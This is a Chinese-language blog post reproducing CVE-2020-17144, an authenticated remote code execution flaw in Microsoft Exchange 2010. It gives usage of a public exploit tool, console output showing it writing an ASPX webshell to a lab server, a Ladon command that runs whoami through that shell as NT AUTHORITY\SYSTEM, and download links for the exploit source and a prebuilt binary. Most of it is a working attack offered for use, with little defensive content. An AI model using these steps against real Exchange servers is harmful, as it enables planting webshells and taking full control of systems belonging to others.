CVE-2020-17144 Exchange遠程代碼執行漏洞復現

漏洞簡介

漏洞是由程序未正確校驗cmdlet參數引起。經過身份驗證的攻擊者利用該漏洞可實現遠程代碼執行。

該漏洞和 CVE-2020-0688 類似,也需要登錄後才能利用,不過在利用時無需明文密碼,只要具備 NTHash 即可。除了常規郵件服務與 OWA外,EWS接口也提供了利用所需的方法。漏洞的功能點本身還具備持久化功能。

影響版本

Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 31

EXP用法

條件: Exchange2010; 普通用戶
默認用法(寫webshell): CVE-2020-17144-EXP.exe mail.example.com user pass

執行命令 & 端口複用: 修改ExploitClass.cs

漏洞復現

C:\Users\k8gege>CVE-2020-17144.exe 192.168.1.89 administrator K8gege520
BinaryFormatter
[+] Target: https://192.168.1.89/ews/Exchange.asmx
[+] User: administrator K8gege520
[+] Shell in https://192.168.1.89/autodiscover/Services.aspx, Wait for few minutes

連接webshell

C:\Users\k8gege>Ladon WebShell aspx cd https://192.168.1.89/autodiscover/Services.aspx Ladon whoami

Load WebShellExec

nt authority\system

image

DownLoad

SRC:https://github.com/Airboi/CVE-2020-17144-EXP

BIN: https://raw.githubusercontent.com/k8gege/K8tools/master/CVE-2020-17114-EXP.rar

小密圈也可下載

參考

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144

https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483712&idx=1&sn=0b2cc3c9692f5c58a4eeb246d4b392fc&chksm=eaa5bb60ddd23276baf4cfd3fc59ca847c28f350c65ef98a17d49bc9944d653fad95dec4fd14&mpshare=1&scene=1&srcid=1209jtbQLVJIgr3VT0Ut1TM9&sharer_sharetime=1607483575995&sharer_shareid=dc9cecc79ba34e4bbb700a43a16153fd#rd

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章